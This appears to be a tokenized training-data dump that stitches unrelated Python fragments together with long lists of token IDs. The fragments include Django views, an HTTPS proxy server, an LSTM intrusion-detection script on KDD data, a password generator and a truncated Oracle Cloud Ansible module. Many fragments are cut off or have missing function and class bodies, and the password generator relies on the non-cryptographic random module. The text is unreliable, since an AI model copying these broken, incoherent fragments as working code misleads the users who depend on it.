198,
197,
197,
4355... | 2.382353 | 68 |
import unittest
from reverse_string import reverse
# Tests adapted from `problem-specifications//canonical-data.json` @ v1.0.1
if __name__ == '__main__':
unittest.main()
| [
11748,
555,
715,
395,
198,
198,
6738,
9575,
62,
8841,
1330,
9575,
628,
198,
2,
30307,
16573,
422,
4600,
45573,
12,
16684,
6637,
1003,
49883,
605,
12,
7890,
13,
17752,
63,
2488,
410,
16,
13,
15,
13,
16,
628,
198,
361,
11593,
3672,
... | 2.934426 | 61 |
from django.views.generic.list import ListView
from django.views.generic.detail import DetailView
from django.shortcuts import get_object_or_404
from campeonatos.models import Player
from campeonatos.models import Team
player_list_view = PlayerListView.as_view()
player_detail_view = PlayerDetailView.as_view()
players_by_team_list_view = PlayersByTeamListView.as_view()
| [
6738,
42625,
14208,
13,
33571,
13,
41357,
13,
4868,
1330,
7343,
7680,
198,
6738,
42625,
14208,
13,
33571,
13,
41357,
13,
49170,
1330,
42585,
7680,
198,
6738,
42625,
14208,
13,
19509,
23779,
1330,
651,
62,
15252,
62,
273,
62,
26429,
198,... | 3.25 | 116 |
class Astronomy(object):
"""
Forcast information about the current astronomic conditions
Attributes:
sunrise: Today's sunrise time. The time is local time and in the format
h:mm am/pm
sunset: Today's sunset time. The time is local time and in the format
h:mm am/pm
"""
| [
198,
198,
4871,
25398,
9145,
7,
15252,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
1114,
2701,
1321,
546,
262,
1459,
10894,
10179,
3403,
628,
220,
220,
220,
49213,
25,
198,
220,
220,
220,
220,
220,
220,
220,
40048,
25,
6288... | 2.688525 | 122 |
# Generated by Django 2.2.6 on 2019-11-13 19:22
from django.db import migrations, models
| [
2,
2980,
515,
416,
37770,
362,
13,
17,
13,
21,
319,
13130,
12,
1157,
12,
1485,
678,
25,
1828,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
11,
4981,
628
] | 2.84375 | 32 |
import logging
from abc import ABCMeta, abstractmethod
import torch.nn as nn
from slowfast.utils.parser import load_config,parse_args
from slowfast.models import head_helper
class BaseRecognizer(nn.Module):
"""Base class for recognizers"""
__metaclass__ = ABCMeta
@property
@property
@abstractmethod
@abstractmethod
# def forward(self, num_modalities, img_meta, return_loss=True, **kwargs):
# num_modalities = int(num_modalities[0])
# if return_loss:
# return self.forward_train(num_modalities, img_meta, **kwargs)
# else:
# return self.forward_test(num_modalities, img_meta, **kwargs)
| [
11748,
18931,
198,
6738,
450,
66,
1330,
9738,
48526,
11,
12531,
24396,
198,
11748,
28034,
13,
20471,
355,
299,
77,
198,
198,
6738,
3105,
7217,
13,
26791,
13,
48610,
1330,
220,
3440,
62,
11250,
11,
29572,
62,
22046,
198,
6738,
3105,
72... | 2.621094 | 256 |
from bedlam import Animation
from bedlam import Button
from bedlam import Game
from bedlam import GameTask
from bedlam import ImageSprite
from bedlam import Scene
from bedlam import Sprite
# __pragma__('skip')
document = window = Math = Date = console = 0 # Prevent complaints by optional static checker
# __pragma__('noskip')
# __pragma__('noalias', 'clear')
| [
6738,
3996,
2543,
1330,
23535,
198,
6738,
3996,
2543,
1330,
20969,
198,
6738,
3996,
2543,
1330,
3776,
198,
6738,
3996,
2543,
1330,
3776,
25714,
198,
6738,
3996,
2543,
1330,
7412,
38454,
578,
198,
6738,
3996,
2543,
1330,
28315,
198,
6738,
... | 3.440367 | 109 |
#
#Copyright Odin Solutions S.L. All Rights Reserved.
#
#SPDX-License-Identifier: Apache-2.0
#
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
import http.client
import logging
import sys
import json
import configparser
from subprocess import Popen, PIPE
import html
import os
import time
#Obtain configuracion from config.cfg file.
cfg = configparser.ConfigParser()
cfg.read(["./config.cfg"])
host = cfg.get("GENERAL", "host")
port = int(cfg.get("GENERAL", "port"))
#keyrock_protocol = cfg.get("GENERAL", "keyrock_protocol")
#keyrock_host = cfg.get("GENERAL", "keyrock_host")
#keyrock_port = cfg.get("GENERAL", "keyrock_port")
keyrock_protocol = str(os.getenv('keyrock_protocol'))
keyrock_host = str(os.getenv('keyrock_host'))
keyrock_port = int(os.getenv('keyrock_port'))
pdp_url = str(os.getenv('PDP_URL'))
logginKPI = cfg.get("GENERAL", "logginKPI")
gcontext = ssl.SSLContext()
logPath="./"
fileName="out"
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s",
handlers=[
logging.FileHandler("{0}/{1}.log".format(logPath, fileName)),
logging.StreamHandler(sys.stdout)
])
httpd = HTTPServer( (host, port), SimpleHTTPRequestHandler )
httpd.socket = ssl.wrap_socket (httpd.socket,
keyfile="certs/server-priv-rsa.pem",
certfile='certs/server-public-cert.pem',
server_side = True)
httpd.serve_forever()
| [
2,
198,
2,
15269,
19758,
23555,
311,
13,
43,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
4303,
36227,
12,
34156,
12,
33234,
7483,
25,
24843,
12,
17,
13,
15,
198,
2,
198,
198,
6738,
2638,
13,
15388,
1330,
38288,
18497,
11,
7308,
4... | 2.527682 | 578 |
from django.contrib import admin
from modelapp.models import Data
# Register your models here.
admin.site.register(Data) | [
6738,
42625,
14208,
13,
3642,
822,
1330,
13169,
201,
198,
6738,
2746,
1324,
13,
27530,
1330,
6060,
201,
198,
201,
198,
2,
17296,
534,
4981,
994,
13,
201,
198,
201,
198,
28482,
13,
15654,
13,
30238,
7,
6601,
8
] | 3.25641 | 39 |
page_template = '''<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8"/>
<style>
{css}
</style>
<title>{title}</title>
</head>
<body>
<div class="content">
<div class="sidenav">
<h3>Links</h3>
{links}
</div>
<div class="article">
<h1>{title}</h1>
{content}
</div>
</div>
</body>
</html>
'''
| [
7700,
62,
28243,
796,
705,
7061,
27,
0,
18227,
4177,
56,
11401,
27711,
29,
220,
198,
1279,
6494,
29,
220,
198,
220,
1279,
2256,
29,
220,
198,
220,
220,
1279,
28961,
34534,
316,
2625,
48504,
12,
23,
26700,
220,
198,
220,
220,
1279,
... | 1.793578 | 218 |
#-----------------------------------------------------------------------------
# Name: uvSenderService.py
# Purpose: Start the UltraGrid video client
#
# Author: Ladan Gharai
# Colin Perkins
#
# Created: 13 August 2004
# Copyright: (c) 2004 University of Southern California
# (c) 2004 University of Glasgow
#
# $Revision: 1.1 $
# $Date: 2007/11/08 09:48:58 $
#
#-----------------------------------------------------------------------------
import sys, os
try: import _winreg
except: pass
from AccessGrid.Types import Capability
from AccessGrid.AGService import AGService
from AccessGrid.AGParameter import ValueParameter, OptionSetParameter, RangeParameter, TextParameter
from AccessGrid import Platform
from AccessGrid.Platform.Config import AGTkConfig, UserConfig
from AccessGrid.NetworkLocation import MulticastNetworkLocation
if __name__ == '__main__':
from AccessGrid.AGService import AGServiceI, RunService
service = uvSenderService()
serviceI = AGServiceI(service)
RunService(service,serviceI,int(sys.argv[1]))
| [
2,
10097,
32501,
198,
2,
6530,
25,
220,
220,
220,
220,
220,
220,
220,
334,
85,
50,
2194,
16177,
13,
9078,
198,
2,
32039,
25,
220,
220,
220,
220,
7253,
262,
14563,
41339,
2008,
5456,
198,
2,
198,
2,
6434,
25,
220,
220,
220,
220,
... | 3.142061 | 359 |
"""This module contains an item representing a node port"""
import collections
import logging
from typing import Dict, Optional, Union
from ..node_ports_common import config, exceptions
log = logging.getLogger(__name__)
DataItemValue = Optional[Union[int, float, bool, str, Dict[str, Union[int, str]]]]
_DataItem = collections.namedtuple("_DataItem", config.DATA_ITEM_KEYS.keys())
class DataItem(_DataItem):
"""Encapsulates a Data Item and provides accessors functions"""
| [
37811,
1212,
8265,
4909,
281,
2378,
10200,
257,
10139,
2493,
37811,
201,
198,
201,
198,
11748,
17268,
201,
198,
11748,
18931,
201,
198,
6738,
19720,
1330,
360,
713,
11,
32233,
11,
4479,
201,
198,
201,
198,
6738,
11485,
17440,
62,
3742,
... | 3.164557 | 158 |
#!/usr/bin/env python3
import argparse
import os
import re
from .config import (
DISTCCD_PORT,
server_settings,
client_settings,
)
from .compiler import wrap_compiler
from .server import daemon
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
11748,
1822,
29572,
198,
11748,
28686,
198,
11748,
302,
198,
198,
6738,
764,
11250,
1330,
357,
198,
220,
220,
220,
220,
360,
8808,
4093,
35,
62,
15490,
11,
198,
220,
220,
22... | 2.75641 | 78 |
import random
# trunk-ignore(flake8/W605)
x = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyl][\][\]\;./0123456789"
passnew = ""
y = int(input("Enter the length of the password"))
for i in range(y):
passnew = passnew + random.choice(x)
print("The generated password is ", passnew)
| [
11748,
4738,
198,
198,
2,
21427,
12,
46430,
7,
47597,
23,
14,
54,
32417,
8,
198,
87,
796,
366,
24694,
32988,
17511,
23852,
42,
31288,
45,
3185,
48,
49,
2257,
52,
30133,
34278,
57,
39305,
4299,
456,
2926,
41582,
10295,
404,
80,
81,
... | 2.466667 | 120 |
# -*- coding: utf-8 -*-
"""
flask_chown.permission_manager_cached
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cached permission manager (based on redis)
:copyright: (c) 2018 by Matthias Riegler.
:license: APACHEv2, see LICENSE.md for more details.
"""
import logging
import json
from . import PermissionManager
import redis
logger = logging.getLogger(__name__)
class CachedPermissionManager(PermissionManager):
""" Caches user groups in a redis datastore, optionally pass a timeout
The `CachedPermissionManager` can be used as a drop in improvement for the
`PermissionManager`. You can create an instance using::
pm = CachedPermissionManager(redis_url="redis://localhost",
timeout=3600)
In this example, a timeout of one hour is set (60 minutes a 60 seconds)
:param redis_url: Redis connection url
:param timeout: Sepcify how long the groups should be cached (in seconds);
Set to 0 for no timeout
"""
def __init__(
self,
*args,
redis_url="redis://localhost",
timeout=0,
**kwargs):
""" Init """
super().__init__(*args, **kwargs)
self.timeout = timeout
# Connect to redis
self._redis = redis.from_url(redis_url)
@classmethod
def user_in_group(self, user, group):
""" Cache this function """
_cached = self.redis.get(self._gen_json_pair(user, group))
if _cached:
return b"True" == self.redis.get(self._gen_json_pair(user, group))
else:
return self._cache(user, group)
def _cache(self, user, group):
""" Caches the call """
result = super().user_in_group(user, group)
key = self._gen_json_pair(user, group)
# Cache in redis
self.redis.set(key, result)
# Set timeout if requested
if self.timeout > 0:
self.redis.expire(key, self.timeout)
return result
@property
def redis(self):
""" Redis """
return self._redis
@property
def timeout(self):
""" :returns: Caching timeout """
return self._timeout
@timeout.setter
def timeout(self, timeout):
""" Sets the timeout """
if timeout >= 0:
self._timeout = timeout
else:
logger.error("{} is not a valid timeout value".format(timeout))
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
220,
220,
220,
42903,
62,
354,
593,
13,
525,
3411,
62,
37153,
62,
66,
2317,
198,
220,
220,
220,
220,
27156,
27156,
8728,
93,
628,
220,
220,
220,
327,
231... | 2.358999 | 1,039 |
# -*- coding: utf-8 -*-
import pandas as pd
from pandas import DataFrame,Series
Cátions=pd.Series([])
Ânions=pd.Series([])
NomedoÍon=pd.Series([])
FórmuladoÍon=pd.Series([])
df=DataFrame({'Cátions':Cátions,'Ânions':Ânions})
df
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
628,
198,
198,
11748,
19798,
292,
355,
279,
67,
198,
6738,
19798,
292,
1330,
6060,
19778,
11,
27996,
628,
198,
34,
6557,
45240,
28,
30094,
13,
27996,
26933,
12962,
198,
5523,... | 2.238095 | 105 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 10 14:22:56 2017
@author: zqzhan
"""
from decimal import Decimal,getcontext
from vector import Vector
getcontext().prec = 30
if __name__ == '__main__':
line1 = Line(Vector([1, 2]), 4)
line2 = Line(Vector([2 , 5]), 9)
print ('first system instersects in:' )
print (line1.intersection(line2))
# second system
# 7.204x + 3.182y = 8.68
# 8.172x + 4.114y = 9.883
line3 = Line(Vector([7.204, 3.182]), 8.68)
line4 = Line(Vector([8.172, 4.114]), 9.883)
print (str(line3))
print ('second system instersects in: {}'.format(line3.intersection(line4)))
# third system
# 1.182x + 5.562y = 6.744
# 1.773x + 8.343y = 9.525
line5 = Line(Vector([1.182, 5.562]), 6.744)
line6 = Line(Vector([1.773, 8.343]), 9.525)
print ('third system instersects in: {}'.format(line5.intersection(line6)))
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
19480,
5267,
838,
1478,
25,
1828,
25,
3980,
2177,
198,
198,
31,
9800,
25,
1976,
80,
89,
... | 2.288889 | 405 |
from argparse import ArgumentParser
from os import system as execute, listdir, rmdir, mkdir
from shutil import copy as copy_file
if __name__ == '__main__':
parser = ArgumentParser(description='Setup the system.')
parser.add_argument('object', default='everything', nargs='?',
choices=['everything', 'bash', 'git'],
metavar='{everything, bash, git}',
help='Object on which to perform the setup.')
arg = parser.parse_args().object
if arg == 'bash':
setup_bash()
elif arg == 'git':
install_and_configure_git()
else:
setup_bash()
configure_dirs()
install_and_configure_yandex_disk()
install_and_configure_git()
install_applications()
| [
6738,
1822,
29572,
1330,
45751,
46677,
198,
6738,
28686,
1330,
1080,
355,
12260,
11,
1351,
15908,
11,
374,
9132,
343,
11,
33480,
15908,
198,
6738,
4423,
346,
1330,
4866,
355,
4866,
62,
7753,
628,
628,
628,
198,
198,
361,
11593,
3672,
... | 2.336283 | 339 |
# -*- coding: utf-8 -*-
# Review Heatmap Add-on for Anki
#
# Copyright (C) 2016-2018 Aristotelis P. <https//glutanimate.com/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version, with the additions
# listed at the end of the accompanied license file.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# NOTE: This program is subject to certain additional terms pursuant to
# Section 7 of the GNU Affero General Public License. You should have
# received a copy of these additional terms immediately following the
# terms and conditions of the GNU Affero General Public License which
# accompanied this program.
#
# If not, please request a copy through one of the means of contact
# listed here: <https://glutanimate.com/contact/>.
#
# Any modifications to this file must keep this entire header intact.
"""
Static web components and templates
"""
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from .libaddon.platform import JSPY_BRIDGE, ANKI21, PLATFORM
__all__ = ["html_main_element", "html_heatmap",
"html_streak", "html_info_nodata"]
html_main_element = """
<script type="text/javascript" src="qrc:/review_heatmap/web/d3.min.js"></script>
<script type="text/javascript" src="qrc:/review_heatmap/web/cal-heatmap.js"></script>
<link rel="stylesheet" href="qrc:/review_heatmap/web/cal-heatmap.css">
<script type="text/javascript" src="qrc:/review_heatmap/web/review-heatmap.js"></script>
<link rel="stylesheet" href="qrc:/review_heatmap/web/review-heatmap.css">
<script>
var pybridge = function(arg){{{{
{bridge}(arg);
}}}};
var rhAnki21 = "{anki21}" === "True";
var rhPlatform = "{platform}";
</script>
<div class="rh-container {{classes}}">
{{content}}
</div>
""".format(bridge=JSPY_BRIDGE, anki21=ANKI21, platform=PLATFORM)
html_heatmap = """
<div class="heatmap">
<div class="heatmap-controls">
<div class="alignleft">
<span> </span>
</div>
<div class="aligncenter">
<div title="Go back\n(Shift-click for first year)" onclick="onHmNavigate(event, this, 'prev');" class="hm-btn">
<img height="10px" src="qrc:/review_heatmap/icons/left.svg" />
</div>
<div title="Today" onclick="onHmHome(event, this);" class="hm-btn">
<img height="10px" src="qrc:/review_heatmap/icons/circle.svg" />
</div>
<div title="Go forward\n(Shift-click for last year)" onclick="onHmNavigate(event, this, 'next');" class="hm-btn">
<img height="10px" src="qrc:/review_heatmap/icons/right.svg" />
</div>
</div>
<div class="alignright">
<div class="hm-btn opts-btn" title="Options" onclick="onHmOpts(event, this);">
<img src="qrc:/review_heatmap/icons/options.svg" />
</div>
<div class="hm-btn opts-btn" title="Support this add-on" onclick="onHmContrib(event, this);">
<img src="qrc:/review_heatmap/icons/heart_bw.svg" />
</div>
</div>
<div style="clear: both;"> </div>
</div>
<div id="cal-heatmap"></div>
</div>
<script type="text/javascript">
cal = initHeatmap({options}, {data});
</script>
"""
html_streak = """
<div class="streak">
<span class="streak-info">Daily average:</span>
<span title="Average reviews on active days"
class="sstats {class_activity_daily_avg}">{text_activity_daily_avg}</span>
<span class="streak-info">Days learned:</span>
<span title="Percentage of days with review activity over entire review history"
class="sstats {class_pct_days_active}">{text_pct_days_active}%</span>
<span class="streak-info">Longest streak:</span>
<span title="Longest continuous streak of review activity. All types of repetitions included."
class="sstats {class_streak_max}">{text_streak_max}</span>
<span class="streak-info">Current streak:</span>
<span title="Current card review activity streak. All types of repetitions included."
class="sstats {class_streak_cur}">{text_streak_cur}</span>
</div>
"""
html_info_nodata = """
No activity data to show (<span class="linkspan" onclick='pybridge("revhm_opts");'>options</span>).
"""
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
2,
6602,
12308,
8899,
3060,
12,
261,
329,
1052,
4106,
198,
2,
198,
2,
15069,
357,
34,
8,
1584,
12,
7908,
220,
23203,
313,
417,
271,
350,
13,
1279,
5450,
1003,
... | 2.659856 | 1,811 |
from stacknet.stacknet_funcs.sparse_funcs import from_sparse_to_file
from stacknet.stacknet_funcs.datetime_funcs import getTimeFeatures
from stacknet.stacknet_funcs.cat_feature_engineering import getCatFeatures
| [
6738,
8931,
3262,
13,
25558,
3262,
62,
12543,
6359,
13,
82,
29572,
62,
12543,
6359,
1330,
422,
62,
82,
29572,
62,
1462,
62,
7753,
198,
6738,
8931,
3262,
13,
25558,
3262,
62,
12543,
6359,
13,
19608,
8079,
62,
12543,
6359,
1330,
651,
... | 3.246154 | 65 |
#!/usr/bin/env python3
# Copyright (c) 2008-9 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 2 of the License, or
# version 3 of the License, or (at your option) any later version. It is
# provided for educational purposes and is distributed in the hope that
# it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See
# the GNU General Public License for more details.
import sys
from PyQt4.QtCore import (QString, Qt, SIGNAL)
from PyQt4.QtGui import (QApplication, QBoxLayout, QDialog,
QDialogButtonBox, QGridLayout, QLabel, QLineEdit, QTextEdit,
QVBoxLayout, QWidget)
LEFT, ABOVE = range(2)
if __name__ == "__main__":
fakeAddress = dict(street="3200 Mount Vernon Memorial Highway",
city="Mount Vernon", state="Virginia",
zipcode="22121")
app = QApplication(sys.argv)
form = Dialog(fakeAddress)
form.show()
app.exec_()
print("Street:", str(form.street.lineEdit.text()))
print("City:", str(form.city.lineEdit.text()))
print("State:", str(form.state.lineEdit.text()))
print("Notes:")
print(str(form.notes.textEdit.toPlainText()))
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
15069,
357,
66,
8,
3648,
12,
24,
1195,
2213,
330,
12052,
13,
1439,
2489,
10395,
13,
198,
2,
770,
1430,
393,
8265,
318,
1479,
3788,
25,
345,
460,
17678,
4163,
340,
290,
14,
... | 2.863544 | 491 |
from __future__ import print_function
from sklearn.cross_validation import train_test_split
import pandas as pd
import numpy as np
np.random.seed(1337) # for reproducibility
from keras.preprocessing import sequence
from keras.utils import np_utils
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Embedding
from keras.layers import LSTM, SimpleRNN, GRU
from keras.datasets import imdb
from keras.utils.np_utils import to_categorical
from sklearn.metrics import (precision_score, recall_score,f1_score, accuracy_score,mean_squared_error,mean_absolute_error)
from sklearn import metrics
from sklearn.preprocessing import Normalizer
import h5py
from keras import callbacks
from keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau, CSVLogger
testdata = pd.read_csv('kdd/binary/kddtest.csv', header=None)
C = testdata.iloc[:,0]
T = testdata.iloc[:,1:42]
scaler = Normalizer().fit(T)
testT = scaler.transform(T)
# summarize transformed data
np.set_printoptions(precision=3)
#print(testT[0:5,:])
y_test = np.array(C)
# reshape input to be [samples, time steps, features]
X_train = np.reshape(testT, (testT.shape[0], 1, testT.shape[1]))
batch_size = 32
# 1. define the network
model = Sequential()
model.add(LSTM(4,input_dim=41)) # try using a GRU instead, for fun
model.add(Dropout(0.1))
model.add(Dense(1))
model.add(Activation('sigmoid'))
# try using different optimizers and different optimizer configs
model.load_weights("kddresults/lstm1layer/checkpoint-51.hdf5")
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
y_train1 = y_test
y_pred = model.predict_classes(X_train)
accuracy = accuracy_score(y_train1, y_pred)
recall = recall_score(y_train1, y_pred , average="binary")
precision = precision_score(y_train1, y_pred , average="binary")
f1 = f1_score(y_train1, y_pred, average="binary")
print("confusion matrix")
print("----------------------------------------------")
print("accuracy")
print("%.3f" %accuracy)
print("racall")
print("%.3f" %recall)
print("precision")
print("%.3f" %precision)
print("f1score")
print("%.3f" %f1)
cm = metrics.confusion_matrix(y_train1, y_pred)
print("==============================================")
print("==============================================")
print(cm)
tp = cm[0][0]
fp = cm[0][1]
tn = cm[1][1]
fn = cm[1][0]
print("tp")
print(tp)
print("fp")
print(fp)
print("tn")
print(tn)
print("fn")
print(fn)
print("tpr")
tpr = float(tp)/(tp+fn)
print("fpr")
fpr = float(fp)/(fp+tn)
print("LSTM acc")
print(tpr)
print(fpr)
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
loss, accuracy = model.evaluate(X_train, y_train1)
print("\nLoss: %.2f, Accuracy: %.2f%%" % (loss, accuracy*100))
t_probs = model.predict_proba(X_train)
print(t_probs)
np.savetxt('prob.txt', t_probs)
print(t_probs.shape)
'''
# try using different optimizers and different optimizer configs
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
checkpointer = callbacks.ModelCheckpoint(filepath="kddresults/lstm1layer/checkpoint-{epoch:02d}.hdf5", verbose=1, save_best_only=True, monitor='val_acc',mode='max')
csv_logger = CSVLogger('training_set_iranalysis.csv',separator=',', append=False)
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=1000, validation_data=(X_test, y_test),callbacks=[checkpointer,csv_logger])
model.save("kddresults/lstm1layer/fullmodel/lstm1layer_model.hdf5")
loss, accuracy = model.evaluate(X_test, y_test)
print("\nLoss: %.2f, Accuracy: %.2f%%" % (loss, accuracy*100))
y_pred = model.predict_classes(X_test)
np.savetxt('kddresults/lstm1layer/lstm1predicted.txt', y_pred, fmt='%01d')
'''
'''
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
loss, accuracy = model.evaluate(X_train, y_train1)
print("\nLoss: %.2f, Accuracy: %.2f%%" % (loss, accuracy*100))
'''
| [
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
6738,
1341,
35720,
13,
19692,
62,
12102,
341,
1330,
4512,
62,
9288,
62,
35312,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
299,
32152,
355,
45941,
198,
37659,
13,
25120,
13,
28... | 2.685655 | 1,457 |
#!/usr/bin/python
# Copyright (c) 2017, 2021 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_blockstorage_boot_volume_backup
short_description: Manage a BootVolumeBackup resource in Oracle Cloud Infrastructure
description:
- This module allows the user to create, update and delete a BootVolumeBackup resource in Oracle Cloud Infrastructure
- For I(state=present), creates a new boot volume backup of the specified boot volume. For general information about boot volume backups,
see L(Overview of Boot Volume Backups,https://docs.cloud.oracle.com/Content/Block/Concepts/bootvolumebackups.htm)
- When the request is received, the backup object is in a REQUEST_RECEIVED state.
When the data is imaged, it goes into a CREATING state.
After the backup is fully uploaded to the cloud, it goes into an AVAILABLE state.
- "This resource has the following action operations in the M(oci_boot_volume_backup_actions) module: copy."
version_added: "2.9"
author: Oracle (@oracle)
options:
boot_volume_id:
description:
- The OCID of the boot volume that needs to be backed up.
- Required for create using I(state=present).
type: str
defined_tags:
description:
- Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
- This parameter is updatable.
type: dict
display_name:
description:
- A user-friendly name for the boot volume backup. Does not have to be unique and it's changeable.
Avoid entering confidential information.
- Required for create, update, delete when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
- This parameter is updatable when C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
type: str
aliases: ["name"]
freeform_tags:
description:
- Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see L(Resource
Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Department\\": \\"Finance\\"}`"
- This parameter is updatable.
type: dict
type:
description:
- The type of backup to create. If omitted, defaults to incremental.
type: str
choices:
- "FULL"
- "INCREMENTAL"
boot_volume_backup_id:
description:
- The OCID of the boot volume backup.
- Required for update using I(state=present) when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
- Required for delete using I(state=absent) when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
type: str
aliases: ["id"]
compartment_id:
description:
- The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the compartment.
- Required for create using I(state=present).
- Required for update when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
- Required for delete when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
type: str
state:
description:
- The state of the BootVolumeBackup.
- Use I(state=present) to create or update a BootVolumeBackup.
- Use I(state=absent) to delete a BootVolumeBackup.
type: str
required: false
default: 'present'
choices: ["present", "absent"]
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_creatable_resource, oracle.oci.oracle_wait_options ]
"""
EXAMPLES = """
- name: Create boot_volume_backup
oci_blockstorage_boot_volume_backup:
boot_volume_id: ocid1.bootvolume.oc1..xxxxxxEXAMPLExxxxxx
compartment_id: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx
- name: Update boot_volume_backup using name (when environment variable OCI_USE_NAME_AS_IDENTIFIER is set)
oci_blockstorage_boot_volume_backup:
defined_tags: {'Operations': {'CostCenter': 'US'}}
display_name: display_name_example
freeform_tags: {'Department': 'Finance'}
compartment_id: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx
- name: Update boot_volume_backup
oci_blockstorage_boot_volume_backup:
defined_tags: {'Operations': {'CostCenter': 'US'}}
display_name: display_name_example
boot_volume_backup_id: ocid1.bootvolumebackup.oc1..xxxxxxEXAMPLExxxxxx
- name: Delete boot_volume_backup
oci_blockstorage_boot_volume_backup:
boot_volume_backup_id: ocid1.bootvolumebackup.oc1..xxxxxxEXAMPLExxxxxx
state: absent
- name: Delete boot_volume_backup using name (when environment variable OCI_USE_NAME_AS_IDENTIFIER is set)
oci_blockstorage_boot_volume_backup:
display_name: display_name_example
compartment_id: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx
state: absent
"""
RETURN = """
boot_volume_backup:
description:
- Details of the BootVolumeBackup resource acted upon by the current operation
returned: on success
type: complex
contains:
boot_volume_id:
description:
- The OCID of the boot volume.
returned: on success
type: string
sample: ocid1.bootvolume.oc1..xxxxxxEXAMPLExxxxxx
compartment_id:
description:
- The OCID of the compartment that contains the boot volume backup.
returned: on success
type: string
sample: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx
defined_tags:
description:
- Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
returned: on success
type: dict
sample: {'Operations': {'CostCenter': 'US'}}
system_tags:
description:
- "System tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\\"foo-namespace\\": {\\"bar-key\\": \\"value\\"}}`"
returned: on success
type: dict
sample: {}
display_name:
description:
- A user-friendly name for the boot volume backup. Does not have to be unique and it's changeable.
Avoid entering confidential information.
returned: on success
type: string
sample: display_name_example
expiration_time:
description:
- The date and time the volume backup will expire and be automatically deleted.
Format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339). This parameter will always be present for backups that
were created automatically by a scheduled-backup policy. For manually created backups,
it will be absent, signifying that there is no expiration time and the backup will
last forever until manually deleted.
returned: on success
type: string
sample: 2013-10-20T19:20:30+01:00
freeform_tags:
description:
- Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see L(Resource
Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Department\\": \\"Finance\\"}`"
returned: on success
type: dict
sample: {'Department': 'Finance'}
id:
description:
- The OCID of the boot volume backup.
returned: on success
type: string
